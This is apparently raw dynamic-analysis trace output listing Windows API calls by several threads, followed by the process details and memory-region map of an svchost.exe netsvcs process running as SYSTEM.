[0037.674] IUri:GetScheme (in: This=0xb8a8c30650, pdwScheme=0xc0aadff5e0 | out: pdwScheme=0xc0aadff5e0*=0x9) returned 0x0
[0037.675] memcpy_s (in: _Destination=0xb8a8c5e598, _DestinationSize=0x8002, _Source=0xb8a8c50666, _SourceSize=0x20 | out: _Destination=0xb8a8c5e598) returned 0x0
[0037.675] IUnknown:Release (This=0xb8a8c30650) returned 0xf
[0037.675] GetTickCount () returned 0x1be98
[0037.678] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0037.679] GetProcAddress (hModule=0x7ffb3cc70000, lpProcName="CoWaitForMultipleHandles") returned 0x7ffb3cca3ef0
[0037.679] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xc0aadff7a0 | out: lpflOldProtect=0xc0aadff7a0*=0x4) returned 1
[0037.679] CoWaitForMultipleHandles (in: dwFlags=0x0, dwTimeout=0x927c0, cHandles=0x1, pHandles=0xc0aaaf8390*=0x15c, lpdwindex=0xc0aadff950 | out: lpdwindex=0xc0aadff950) returned 0x0
[0038.322] CoWaitForMultipleHandles (in: dwFlags=0x0, dwTimeout=0x927c0, cHandles=0x1, pHandles=0xc0aaaf8390*=0x15c, lpdwindex=0xc0aadff950 | out: lpdwindex=0xc0aadff950) returned 0x0
[0038.441] GetTickCount () returned 0x1c195
[0038.441] CoWaitForMultipleHandles (in: dwFlags=0x0, dwTimeout=0x927c0, cHandles=0x1, pHandles=0xc0aaaf8390*=0x15c, lpdwindex=0xc0aadff950 | out: lpdwindex=0xc0aadff950) returned 0x0
[0039.016] GetTickCount () returned 0x1c3c8
[0039.016] GetCurrentThreadId () returned 0xcc0
[0039.016] CoWaitForMultipleHandles (in: dwFlags=0x0, dwTimeout=0x927c0, cHandles=0x1, pHandles=0xc0aaaf8390*=0x15c, lpdwindex=0xc0aadff950 | out: lpdwindex=0xc0aadff950) returned 0x0
[0041.206] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0041.207] GetProcAddress (hModule=0x7ffb3cc70000, lpProcName="CoUninitialize") returned 0x7ffb3cce2380
[0041.207] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xc0aadff7b0 | out: lpflOldProtect=0xc0aadff7b0*=0x4) returned 1
[0041.207] CoUninitialize ()
[0041.659] FreeLibraryAndExitThread (hLibModule=0x7ffb223a0000, dwExitCode=0x0)
[0041.659] GetCurrentThreadId () returned 0xcc0
Thread:
id = 6
os_tid = 0xcbc
[0037.906] GetCurrentThreadId () returned 0xcbc
[0037.906] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x7ffb22474320, phModule=0xc0aaeffe98 | out: phModule=0xc0aaeffe98*=0x7ffb223a0000) returned 1
[0037.906] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aaeffe20 | out: lpPerformanceCount=0xc0aaeffe20*=403539684) returned 1
[0037.906] WaitForSingleObject (hHandle=0x2e0, dwMilliseconds=0x5d) returned 0x0
[0037.906] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aaeffe20 | out: lpPerformanceCount=0xc0aaeffe20*=403539982) returned 1
[0037.906] WaitForSingleObject (hHandle=0x2e0, dwMilliseconds=0x5d) returned 0x102
[0038.323] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aaeffe20 | out: lpPerformanceCount=0xc0aaeffe20*=405006616) returned 1
[0038.323] WaitForSingleObject (hHandle=0x2e0, dwMilliseconds=0xffffffff) returned 0x0
[0039.035] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aaeffe20 | out: lpPerformanceCount=0xc0aaeffe20*=407510099) returned 1
[0039.035] WaitForSingleObject (hHandle=0x2e0, dwMilliseconds=0x52) returned 0x102
[0039.179] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aaeffe20 | out: lpPerformanceCount=0xc0aaeffe20*=408015354) returned 1
[0039.179] WaitForSingleObject (hHandle=0x2e0, dwMilliseconds=0xffffffff) returned 0x0
[0040.645] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aaeffe20 | out: lpPerformanceCount=0xc0aaeffe20*=413167686) returned 1
[0040.645] WaitForSingleObject (hHandle=0x2e0, dwMilliseconds=0x64) returned 0x102
[0040.918] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aaeffe20 | out: lpPerformanceCount=0xc0aaeffe20*=414128650) returned 1
[0040.918] WaitForSingleObject (hHandle=0x2e0, dwMilliseconds=0xffffffff) returned 0x0
[0041.190] FreeLibraryAndExitThread (hLibModule=0x7ffb223a0000, dwExitCode=0x0)
[0041.190] GetCurrentThreadId () returned 0xcbc
Thread:
id = 7
os_tid = 0xcc8
[0037.906] GetCurrentThreadId () returned 0xcc8
[0037.906] GetCurrentThread () returned 0xfffffffffffffffe
[0037.906] SetThreadPriority (hThread=0xfffffffffffffffe, nPriority=15) returned 1
[0037.906] WTSGetActiveConsoleSessionId () returned 0x1
[0037.906] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0037.906] LoadLibraryExA (lpLibFileName="dxgi.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffb37bf0000
[0038.038] GetProcAddress (hModule=0x7ffb37bf0000, lpProcName="CreateDXGIFactory") returned 0x7ffb37bf5de0
[0038.038] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xc0aafff4a0 | out: lpflOldProtect=0xc0aafff4a0*=0x4) returned 1
[0038.038] CreateDXGIFactory () returned 0x0
[0038.556] EnumDisplaySettingsW (in: lpszDeviceName=0x0, iModeNum=0xffffffff, lpDevMode=0xc0aafff630 | out: lpDevMode=0xc0aafff630) returned 1
[0038.556] WTSGetActiveConsoleSessionId () returned 0x1
[0038.556] CreateDXGIFactory () returned 0x0
[0038.557] EnumDisplaySettingsW (in: lpszDeviceName=0x0, iModeNum=0xffffffff, lpDevMode=0xc0aafff630 | out: lpDevMode=0xc0aafff630) returned 1
[0038.557] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=405828662) returned 1
[0038.755] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=406524885) returned 1
[0038.755] GetWindowThreadProcessId (in: hWnd=0x7016c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0038.755] PostMessageW (hWnd=0x7016c, Msg=0x401, wParam=0x6e470e2, lParam=0x3d09) returned 1
[0038.755] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=406525442) returned 1
[0038.897] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=407022660) returned 1
[0038.897] GetWindowThreadProcessId (in: hWnd=0x7016c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0038.897] PostMessageW (hWnd=0x7016c, Msg=0x401, wParam=0x6e699f9, lParam=0x3d09) returned 1
[0038.897] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=407023222) returned 1
[0038.948] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=407202408) returned 1
[0038.948] GetWindowThreadProcessId (in: hWnd=0x7016c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0038.948] PostMessageW (hWnd=0x7016c, Msg=0x401, wParam=0x6e761b1, lParam=0x3d09) returned 1
[0038.948] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=407202966) returned 1
[0039.001] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=407390907) returned 1
[0039.001] GetWindowThreadProcessId (in: hWnd=0x7016c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0039.001] PostMessageW (hWnd=0x7016c, Msg=0x401, wParam=0x6e83323, lParam=0x3d09) returned 1
[0039.002] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=407391453) returned 1
[0039.035] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=407508948) returned 1
[0039.035] GetWindowThreadProcessId (in: hWnd=0x7016c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0039.035] PostMessageW (hWnd=0x7016c, Msg=0x401, wParam=0x6e8b64b, lParam=0x3d09) returned 1
[0039.035] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=407509493) returned 1
[0039.048] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=407556036) returned 1
[0039.048] GetWindowThreadProcessId (in: hWnd=0x7016c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0039.048] PostMessageW (hWnd=0x7016c, Msg=0x401, wParam=0x6e8ea9d, lParam=0x3d09) returned 1
[0039.048] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=407556547) returned 1
[0039.065] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=407614631) returned 1
[0039.065] GetWindowThreadProcessId (in: hWnd=0x7016c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0039.065] PostMessageW (hWnd=0x7016c, Msg=0x401, wParam=0x6e92bb8, lParam=0x3d09) returned 1
[0039.065] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=407615138) returned 1
[0039.179] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=408014288) returned 1
[0039.179] GetWindowThreadProcessId (in: hWnd=0x7016c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0039.179] PostMessageW (hWnd=0x7016c, Msg=0x401, wParam=0x6eae7c9, lParam=0x3d09) returned 1
[0039.179] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=408014849) returned 1
[0039.263] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=408310028) returned 1
[0039.263] GetWindowThreadProcessId (in: hWnd=0x7016c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0039.263] PostMessageW (hWnd=0x7016c, Msg=0x401, wParam=0x6ec3063, lParam=0x3d09) returned 1
[0039.263] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=408310665) returned 1
[0039.283] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=408380800) returned 1
[0039.283] GetWindowThreadProcessId (in: hWnd=0x7016c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0039.283] PostMessageW (hWnd=0x7016c, Msg=0x401, wParam=0x6ec7f06, lParam=0x3d09) returned 1
[0039.283] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=408381635) returned 1
[0039.314] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=408490708) returned 1
[0039.314] GetWindowThreadProcessId (in: hWnd=0x7016c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0039.314] PostMessageW (hWnd=0x7016c, Msg=0x401, wParam=0x6ecf925, lParam=0x3d09) returned 1
[0039.314] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=408491227) returned 1
[0039.530] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=409250618) returned 1
[0039.530] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=409250878) returned 1
[0039.548] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=409313969) returned 1
[0039.548] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=409314221) returned 1
[0039.576] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=409411737) returned 1
[0039.576] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=409411989) returned 1
[0039.669] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=409739148) returned 1
[0039.669] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=409739418) returned 1
[0039.700] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=409845945) returned 1
[0039.700] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=409846236) returned 1
[0039.720] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=409918121) returned 1
[0039.720] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=409918412) returned 1
[0039.736] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=409973791) returned 1
[0039.736] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=409974068) returned 1
[0039.813] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=410245334) returned 1
[0039.813] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=410245645) returned 1
[0039.835] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=410321545) returned 1
[0039.835] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=410321811) returned 1
[0039.920] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=410621368) returned 1
[0039.920] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=410621630) returned 1
[0039.939] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=410687424) returned 1
[0039.939] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=410687683) returned 1
[0039.990] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=410867289) returned 1
[0039.990] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=410867552) returned 1
[0040.283] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=411895444) returned 1
[0040.283] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=411895710) returned 1
[0040.299] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=411951428) returned 1
[0040.299] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=411951736) returned 1
[0040.330] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=412060689) returned 1
[0040.330] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=412060949) returned 1
[0040.350] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=412130406) returned 1
[0040.350] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=412130680) returned 1
[0040.377] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=412225595) returned 1
[0040.377] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=412225895) returned 1
[0040.397] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=412298450) returned 1
[0040.397] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=412298712) returned 1
[0040.423] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=412390096) returned 1
[0040.423] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=412390345) returned 1
[0040.455] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=412500652) returned 1
[0040.455] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=412501011) returned 1
[0040.470] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=412555651) returned 1
[0040.471] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=412555996) returned 1
[0040.616] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=413068674) returned 1
[0040.616] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=413068942) returned 1
[0040.642] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=413159049) returned 1
[0040.642] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=413159297) returned 1
[0040.673] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=413269352) returned 1
[0040.674] GetWindowThreadProcessId (in: hWnd=0x7016c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0040.674] PostMessageW (hWnd=0x7016c, Msg=0x401, wParam=0x701b6c7, lParam=0x3d09) returned 1
[0040.674] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=413269899) returned 1
[0040.689] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=413324404) returned 1
[0040.689] GetWindowThreadProcessId (in: hWnd=0x7016c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0040.689] PostMessageW (hWnd=0x7016c, Msg=0x401, wParam=0x701f3f3, lParam=0x3d09) returned 1
[0040.689] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=413324990) returned 1
[0040.705] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=413379504) returned 1
[0040.705] GetWindowThreadProcessId (in: hWnd=0x7016c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0040.705] PostMessageW (hWnd=0x7016c, Msg=0x401, wParam=0x702312c, lParam=0x3d09) returned 1
[0040.705] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=413380089) returned 1
[0040.733] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=413477126) returned 1
[0040.733] GetWindowThreadProcessId (in: hWnd=0x7016c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0040.733] PostMessageW (hWnd=0x7016c, Msg=0x401, wParam=0x7029da4, lParam=0x3d09) returned 1
[0040.733] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=413477696) returned 1
[0040.752] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=413543892) returned 1
[0040.752] GetWindowThreadProcessId (in: hWnd=0x7016c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x210
[0040.752] PostMessageW (hWnd=0x7016c, Msg=0x401, wParam=0x702e7d3, lParam=0x3d09) returned 1
[0040.752] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=413544421) returned 1
[0040.909] QueryPerformanceCounter (in: lpPerformanceCount=0xc0aafff758 | out: lpPerformanceCount=0xc0aafff758*=414096896) returned 1
[0040.909] WaitForMultipleObjects (nCount=0x2, lpHandles=0xc0aafff7b0*=0x2ec, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0
[0040.909] WaitForMultipleObjects (nCount=0x2, lpHandles=0xc0aafff7b0*=0x2ec, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1
[0040.909] WaitForMultipleObjects (nCount=0x2, lpHandles=0xc0aafff7b0*=0x2ec, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0
[0041.661] GetCurrentThreadId () returned 0xcc8
Thread:
id = 8
os_tid = 0xcc4
[0038.134] GetCurrentThreadId () returned 0xcc4
Thread:
id = 9
os_tid = 0xcd0
[0038.334] GetCurrentThreadId () returned 0xcd0
Thread:
id = 10
os_tid = 0xccc
[0038.334] GetCurrentThreadId () returned 0xccc
Thread:
id = 11
os_tid = 0x9cc
[0039.287] GetCurrentThreadId () returned 0x9cc
[0041.200] GetCurrentThreadId () returned 0x9cc
Thread:
id = 97
os_tid = 0xcf8
[0041.152] GetCurrentThreadId () returned 0xcf8
[0041.153] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="C:\\Windows\\System32\\jscript9.dll", phModule=0xc0ace8fc58 | out: phModule=0xc0ace8fc58*=0x7ffb21f00000) returned 1
[0041.154] SetEvent (hEvent=0x528) returned 1
[0041.199] GetCurrentThread () returned 0xfffffffffffffffe
[0041.199] SetThreadPriority (hThread=0xfffffffffffffffe, nPriority=-1) returned 1
[0041.666] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0xc0ace8fc60*=0x524, bWaitAll=0, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
[0041.666] SetEvent (hEvent=0x528) returned 1
[0041.670] FreeLibraryAndExitThread (hLibModule=0x7ffb21f00000, dwExitCode=0x0)
[0041.670] GetCurrentThreadId () returned 0xcf8
Process:
id = "2"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x55f95000"
os_pid = "0x32c"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "rpc_server"
parent_id = "1"
os_parent_pid = "0x700"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b1b3" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 297
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 298
start_va = 0x1c8ba50000
end_va = 0x1c8ba5ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8ba50000"
filename = ""
Region:
id = 299
start_va = 0x1c8ba60000
end_va = 0x1c8ba60fff
entry_point = 0x1c8ba60000
region_type = mapped_file
name = "svchost.exe.mui"
filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui")
Region:
id = 300
start_va = 0x1c8ba70000
end_va = 0x1c8ba83fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8ba70000"
filename = ""
Region:
id = 301
start_va = 0x1c8ba90000
end_va = 0x1c8bb0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8ba90000"
filename = ""
Region:
id = 302
start_va = 0x1c8bb10000
end_va = 0x1c8bb13fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8bb10000"
filename = ""
Region:
id = 303
start_va = 0x1c8bb20000
end_va = 0x1c8bb20fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8bb20000"
filename = ""
Region:
id = 304
start_va = 0x1c8bb30000
end_va = 0x1c8bb31fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8bb30000"
filename = ""
Region:
id = 305
start_va = 0x1c8bb40000
end_va = 0x1c8bbfdfff
entry_point = 0x1c8bb40000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 306
start_va = 0x1c8bc00000
end_va = 0x1c8bc00fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8bc00000"
filename = ""
Region:
id = 307
start_va = 0x1c8bc10000
end_va = 0x1c8bc10fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8bc10000"
filename = ""
Region:
id = 308
start_va = 0x1c8bc20000
end_va = 0x1c8bc26fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8bc20000"
filename = ""
Region:
id = 309
start_va = 0x1c8bc30000
end_va = 0x1c8bc30fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8bc30000"
filename = ""
Region:
id = 310
start_va = 0x1c8bc40000
end_va = 0x1c8bc40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8bc40000"
filename = ""
Region:
id = 311
start_va = 0x1c8bc50000
end_va = 0x1c8bc56fff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8bc50000"
filename = ""
Region:
id = 312
start_va = 0x1c8bc60000
end_va = 0x1c8bcdffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8bc60000"
filename = ""
Region:
id = 313
start_va = 0x1c8bce0000
end_va = 0x1c8bce1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8bce0000"
filename = ""
Region:
id = 314
start_va = 0x1c8bcf0000
end_va = 0x1c8bcf0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8bcf0000"
filename = ""
Region:
id = 315
start_va = 0x1c8bd00000
end_va = 0x1c8bdfffff
entry_point = 0x0
region_type = private
name = "private_0x0000001c8bd00000"
filename = ""
Region:
id = 316
start_va = 0x1c8be00000
end_va = 0x1c8bebffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000001c8be00000"
filename = ""
Region:
id = 317
start_va = 0x1c8bec0000
end_va = 0x1c8beccfff
entry_point = 0x1c8bec0000
region_type = mapped_file
name = "iphlpsvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui")
Region:
id = 318
start_va = 0x1c8bed0000
end_va = 0x1c8bed6fff
entry_point = 0x0
region_type = private
